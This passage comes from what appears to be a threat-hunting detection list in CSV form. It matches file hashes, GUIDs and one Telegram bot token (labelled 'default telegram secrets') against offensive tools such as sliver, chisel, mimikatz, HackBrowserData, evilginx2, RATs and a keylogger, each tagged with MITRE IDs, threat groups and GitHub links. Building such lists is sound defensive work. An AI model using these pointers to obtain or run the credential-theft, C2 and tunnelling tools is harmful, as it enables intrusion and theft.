MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28784" "*70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6*",".{0,1000}70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28785" "*70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5*",".{0,1000}70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28786" "*70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36*",".{0,1000}70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28787" "*70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6*",".{0,1000}70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28789" "*70e7482f10e68718812ed28e9511b2e9b005a82ac058153ac761fdfec9a115bf*",".{0,1000}70e7482f10e68718812ed28e9511b2e9b005a82ac058153ac761fdfec9a115bf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28790" "*70eab06c1a1f041d6e3d65e83623ba9097855ec1e8330d1bfbe4153d23dd4989*",".{0,1000}70eab06c1a1f041d6e3d65e83623ba9097855ec1e8330d1bfbe4153d23dd4989.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","28791" "*70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6*",".{0,1000}70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#filehash","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","28792" "*70f0161252fd75f2cbd71a5fadaa3346b5336bdfebfcf27fa70f37349d193513*",".{0,1000}70f0161252fd75f2cbd71a5fadaa3346b5336bdfebfcf27fa70f37349d193513.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28793" "*70f60b2e7f6e64317222ec504392f975e14fa9cad5ed05329f6eb8d7bcff6956*",".{0,1000}70f60b2e7f6e64317222ec504392f975e14fa9cad5ed05329f6eb8d7bcff6956.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","28797" "*70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6*",".{0,1000}70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28798" "*70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2*",".{0,1000}70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28800" "*70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3*",".{0,1000}70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28801" "*7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4*",".{0,1000}7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28804" "*710db84c96a19c705db2d2111576fd459c7d999080462000cf93d02733e4521a*",".{0,1000}710db84c96a19c705db2d2111576fd459c7d999080462000cf93d02733e4521a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","28806" "*7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b*",".{0,1000}7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - 
T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28808" "*71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78*",".{0,1000}71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28809" "*7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3*",".{0,1000}7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28810" "*7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1*",".{0,1000}7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28811" "*711eb4700b1a0609805647b1cd85fe3a3a0122eb17a2bca7488298a27d4d46c5*",".{0,1000}711eb4700b1a0609805647b1cd85fe3a3a0122eb17a2bca7488298a27d4d46c5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28813" "*711ec8068cab80239b91cec707e3f811806aaee6758a536eabd0548d9a53d1a9*",".{0,1000}711ec8068cab80239b91cec707e3f811806aaee6758a536eabd0548d9a53d1a9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28814" "*71257aa853990279a1801d95495b3fd05c5b9b15d4983289d41f947003c8bce6*",".{0,1000}71257aa853990279a1801d95495b3fd05c5b9b15d4983289d41f947003c8bce6.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","28815" "*7133a7bae7094a163a75a072f6859a89b54326a111b86af5084fb88206bb89a1*",".{0,1000}7133a7bae7094a163a75a072f6859a89b54326a111b86af5084fb88206bb89a1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28816" "*713490eff933ebcb0ce0bde4429f3ae4cee69cb4663d5172c2242738f97f5a4d*",".{0,1000}713490eff933ebcb0ce0bde4429f3ae4cee69cb4663d5172c2242738f97f5a4d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28817" "*713724C3-2367-49FA-B03F-AB4B336FB405*",".{0,1000}713724C3\-2367\-49FA\-B03F\-AB4B336FB405.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - 
Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","0","#GUIDproject","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","28818" "*713c7d03ee5e75b2cacae76a91418ce7855faf39c485f97aed1e277bab87de47*",".{0,1000}713c7d03ee5e75b2cacae76a91418ce7855faf39c485f97aed1e277bab87de47.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","28819" "*71461ca71bcebb5fefa9394fe8e9a5a47c102195064d1f4cb5f24d330c9be97d*",".{0,1000}71461ca71bcebb5fefa9394fe8e9a5a47c102195064d1f4cb5f24d330c9be97d.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","28821" "*7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd*",".{0,1000}7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28822" 
"*714f969a0a24c346dda4c22eca5536e3d86f7137e64388af7c54e3b11db499ac*",".{0,1000}714f969a0a24c346dda4c22eca5536e3d86f7137e64388af7c54e3b11db499ac.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28823" "*714f984be43793682fc8edb7c9865bf864c8051d83aa08d197c5c0bd7d96348f*",".{0,1000}714f984be43793682fc8edb7c9865bf864c8051d83aa08d197c5c0bd7d96348f.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28824" "*7151e9f573e106dd3cf0b0741ce31a0247a8a2fc7e3e3ed6860a7aa836376958*",".{0,1000}7151e9f573e106dd3cf0b0741ce31a0247a8a2fc7e3e3ed6860a7aa836376958.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28825" "*7154bfcd36cdab9e802830e9bf01f34f87fe905919e669ccdb620bb5dc9bc90b*",".{0,1000}7154bfcd36cdab9e802830e9bf01f34f87fe905919e669ccdb620bb5dc9bc90b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28826" 
"*716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54*",".{0,1000}716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28827" "*716ba53b9245b9f98cd68f191e20451f7a6d54864486051e8ce1f08132df97e4*",".{0,1000}716ba53b9245b9f98cd68f191e20451f7a6d54864486051e8ce1f08132df97e4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28828" "*716f0192964bd6c83ec16d8c12ff0e6a3e93d34dcb50c340412e5b63329c214a*",".{0,1000}716f0192964bd6c83ec16d8c12ff0e6a3e93d34dcb50c340412e5b63329c214a.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","28829" "*7186796941:AAHmCxfhfQvNwDAtlvAmGY-N9c5sFXhHpNM*",".{0,1000}7186796941\:AAHmCxfhfQvNwDAtlvAmGY\-N9c5sFXhHpNM.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","default telegram secrets","10","","N/A","","","","28833" "*7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a*",".{0,1000}7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28834" "*719959af4f0b5b90acacae460e0965e6181766a60a27f536bfae473121a51ff9*",".{0,1000}719959af4f0b5b90acacae460e0965e6181766a60a27f536bfae473121a51ff9.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28838" "*71a4456ea5aa14b3799672c2b57a2629a2ed5e0f3183a06bf9e3464d99b3941a*",".{0,1000}71a4456ea5aa14b3799672c2b57a2629a2ed5e0f3183a06bf9e3464d99b3941a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28841" "*71ad700e300bf6b1bb195321b47a176bb9fe5b20298e5d70bf0a682e1b312712*",".{0,1000}71ad700e300bf6b1bb195321b47a176bb9fe5b20298e5d70bf0a682e1b312712.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28843" "*71b7bfe3654793f6184c576c0e50df3ffef5f1e1930db72c46e96e756e9d9680*",".{0,1000}71b7bfe3654793f6184c576c0e50df3ffef5f1e1930db72c46e96e756e9d9680.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28846" "*71b9c3db10f12ee563c0668b04171ca99e79ab1cd09911bc79f061d6d3da544d*",".{0,1000}71b9c3db10f12ee563c0668b04171ca99e79ab1cd09911bc79f061d6d3da544d.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","28847" 
"*71bda8ea-08bc-4ab1-9b40-614b167beb64*",".{0,1000}71bda8ea\-08bc\-4ab1\-9b40\-614b167beb64.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#GUIDproject","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","28848" "*71bf606f92142a5dcbddd46e0c4877b96cd733ee0784d652b371a5450dff3f45*",".{0,1000}71bf606f92142a5dcbddd46e0c4877b96cd733ee0784d652b371a5450dff3f45.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28850" 